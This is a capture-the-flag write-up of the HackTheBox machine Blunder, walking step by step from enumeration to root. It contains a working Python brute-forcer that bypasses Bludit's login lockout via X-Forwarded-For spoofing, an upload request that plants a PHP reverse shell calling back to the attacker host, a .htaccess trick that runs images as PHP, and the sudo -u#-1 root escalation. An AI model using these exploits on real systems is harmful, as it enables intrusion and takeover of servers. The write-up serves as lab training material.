Blunder 10.10.10.191
Persistence is very important. You should not give up unless you are forced to give up (Elon Musk)
Completed at 29 October 2020

Background

Blunder is a Linux machine from HackTheBox, which is a real-life similar box that required CVE exploit technique, for training your ethical hacking and penetration testing skills.
After basic enumeration, this Linux server is a web application develops using the blunder CMS running on port 80. Using the tool Drib, some hidden files are found which contain a possible user name "fergus", and a Bruteforce protected admin login page also identifies.
After google, I find that the Bruteforce protection of this version blunder CMS can be bypassed. Get the administrative privilege account. I am trying to upload PHP reverse shell to the site via the provided image uploaded function, uploaded success but fail to get the access path. Google again, there is a CVE exploit on the Bludit that related to the directory traversal. Follow the instruction, get the low privilege access.
The system is enumerated, there is a newer version of Bludit CMS is found and a file-based user account database is identified. There is an SHA-1 hashed password of a user account hugo. Crack the password using an online tool and get this user account access.
Enumerate the system again with a tool - linpeas, the sudo version have PE vulnerability. Following the exploitDB instruction, get the root access finally.
Target Machine: 10.10.10.191
Attacker Machine: 10.10.14.16

Hacking Process Part 0 – Service Scanning

Quick Pre-searching

nmap -p- -T5 --min-rate=1000 10.10.10.191 -oG fkclai.nmap

Details Analysis

nmap -p $(grep -Eo '[0-9]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.10.191 -o nmap-result.txt
Enumeration Strategy
Only port 80 open, focus on the web application and check any CVE vulnerability.

Hacking Process Part 1 – Enumeration

1.1 Enumerating the website

Using the following tools, a folder and two files are found, /admin/, /robots.txt, and /todo.txt
  • gobuster dir -u http://10.10.10.191 -w /usr/share/wordlists/dirb/common.txt -x txt,pdf,php
  • dirb http://10.10.10.191/ /usr/share/wordlists/dirb/common.txt -o dirb-191.result
  • gobuster dir -u 'http://10.10.10.191/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-191.result
  • python3 /root/Documents/ctf/tools/dirsearch/dirsearch.py -u http://10.10.10.191/ -e jsp,txt -x 301,302,403,404 --simple-report=dirsearch-191.result
/robots.txt
/todo.txt
/admin/
The source code of the login portal shows that it builds by the Bludit CMS and version is 3.9.2 and /todo.txt hints of a user fergus.

1.2 Get the website login

Brute forcing is not a simple task as the site is implemented the CSRF token, and after 10 login attempts my IP address being blocked. Next steps, I am going to search for any vulnerable of this bludit version and this blog is found.
I am failure by using the rockyou.txt as the password list to gain the website login access, but, it is success using cewl to gathering the wordlist from the site.
1
#!/usr/bin/env python3
2
import re
3
import requests
4
5
host = 'http://10.10.10.191'
6
login_url = host + '/admin/login'
7
username = 'fergus'
8
wordlist = []
9
10
pwd = open('password.txt','r')
11
for line in pwd:
12
line=line.rstrip()
13
wordlist.append(line)
14
15
# Add the correct password to the end of the list
16
wordlist.append('adminadmin')
17
18
for password in wordlist:
19
session = requests.Session()
20
login_page = session.get(login_url)
21
csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
22
print('[*] Trying: {p}'.format(p = password))
23
headers = {
24
'X-Forwarded-For': password,
25
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
26
'Referer': login_url
27
}
28
29
data = {
30
'tokenCSRF': csrf_token,
31
'username': username,
32
'password': password,
33
'save': ''
34
}
35
36
login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)
37
38
if 'location' in login_result.headers:
39
if '/admin/dashboard' in login_result.headers['location']:
40
print()
41
print('SUCCESS: Password found!')
42
print('Use {u}:{p} to login.'.format(u = username, p = password))
43
print()
44
break
45
Copied!
1
[email protected]:~/Documents/ctf/htb/linux/17-HTB-Blunder/exploit# cewl 10.10.10.191 > password.txt
2
3
[email protected]:~/Documents/ctf/htb/linux/17-HTB-Blunder/exploit# python3 exploit.py
4
[*] Trying: CeWL 5.4.6 (Exclusion) Robin Wood ([email protected]) (https://digi.ninja/)
5
[*] Trying: the
6
[*] Trying: Load
7
[*] Trying: Plugins
8
[*] Trying: and
9
.......
10
.....
11
....
12
...
13
[*] Trying: Letters
14
[*] Trying: probably
15
[*] Trying: best
16
[*] Trying: fictional
17
[*] Trying: character
18
[*] Trying: RolandDeschain
19
20
SUCCESS: Password found!
21
Use fergus:RolandDeschain to login.
22
Copied!

Hacking Process Part 2 - Initial low privilege access

Enumerated the system after got the login access, there is an image upload function. A PHP reverse shell file and ".htaccess" can be bypassed the client-side validation and uploaded to the server successfully. But the file access path cannot be found.
After searching on the exploit database, there is a CVE vulnerability on Bludit 3.9.2 that related to the directory traversal. The PoC scripts show that the UUID can be used to control the result access path.

2.1 Get the www account access

As the upload validation only applies on the client-side, thus, using the burp to change the upload parameters (value of filename), the PHP reverse shell and the.htaccessfiles are uploaded to the /tmp/folder. I can execute the reverse shell PHP by visiting the http://10.10.10.191/bl-content/tmp/reverse.php
1
POST /admin/ajax/upload-images HTTP/1.1
2
Host: 10.10.10.191
3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
4
Accept: */*
5
Accept-Language: en-US,en;q=0.5
6
Accept-Encoding: gzip, deflate
7
Referer: http://10.10.10.191/admin/new-content
8
X-Requested-With: XMLHttpRequest
9
Content-Type: multipart/form-data; boundary=---------------------------1577569979961725874602175024
10
Content-Length: 11616
11
Connection: close
12
Cookie: BLUDIT-KEY=ngp0psekevm7je3hnrlhjmkj57
13
14
-----------------------------1577569979961725874602175024
15
Content-Disposition: form-data; name="images[]"; filename="reverse.png"
16
Content-Type: image/png
17
.....
18
.....
19
<?php
20
// php-reverse-shell - A Reverse Shell implementation in PHP
21
// Copyright (C) 2007 [email protected]
22
.....
23
.....
24
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
25
26
set_time_limit (0);
27
$VERSION = "1.0";
28
$ip = '10.10.14.16'; // CHANGE THIS
29
$port = 1234; // CHANGE THIS
30
$chunk_size = 1400;
31
$write_a = null;
32
$error_a = null;
33
$shell = 'uname -a; w; id; /bin/bash -i';
34
....
35
...
36
..
37
-----------------------------1577569979961725874602175024
38
Content-Disposition: form-data; name="uuid"
39
40
../../tmp
41
-----------------------------1577569979961725874602175024
42
Content-Disposition: form-data; name="tokenCSRF"
43
44
60f8752883482353d1ad20bbff841b4aa9668c71
45
-----------------------------1577569979961725874602175024--
Copied!
1
#.htaccess file
2
RewriteEngine off
3
AddType application/x-httpd-php .png
4
Copied!
Finally, the initial web server account privilege access is obtained.

2.2 Get the user account access

The system file shows that this bludit CMS setup to use the file-based database, three hashed password are found at users.php of two bludit folders. According to the official website for recovery the admin password file, this hashed password is in SHA-1 format. Using the online tool to decrypt the hashed password. The password for hugo account obtains which is Password120.
I find that Hugo reuse his password reuse on their system account. Let's spawn a PTY shell, as this will allow us to use the su command. The low privilege user account obtain.
1
[email protected]:/var/www/bludit-3.10.0a/bl-content/databases$ python -c "import pty;pty.spawn('/bin/bash');"
2
[email protected]:/var/www/bludit-3.10.0a/bl-content/databases$ su hugo
3
su hugo
4
Password: Password120
Copied!

Hacking Process Part 3 - Privilege Escalation

Download the linpeas.sh to study the environment search for possible paths to escalate privileges on Linux hosts. The result shows the sudo version of this system is one of the possible paths to escalate privilege.
Searching the exploit db again, there is a CVS exploit on this sudo version is identified. Following the instruction, the root privilege obtain.
2
3
sudo -l
4
Password: Password120
5
6
Matching Defaults entries for hugo on blunder:
7
env_reset, mail_badpass,
8
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
9
10
User hugo may run the following commands on blunder:
11
(ALL, !root) /bin/bash
12
[email protected]:~$ sudo --version
13
sudo --version
14
Sudo version 1.8.25p1
15
Sudoers policy plugin version 1.8.25p1
16
Sudoers file grammar version 46
17
Sudoers I/O plugin version 1.8.25p1
19
[email protected]:/$ sudo -u#-1 /bin/bash
20
sudo -u#-1 /bin/bash
21
Password: Password120
22
Copied!

Recommendation

Missing patches are very common in the real-life system, we need to keep the system patches are updated to avoid know attack.

Reference Link

Last modified 1yr ago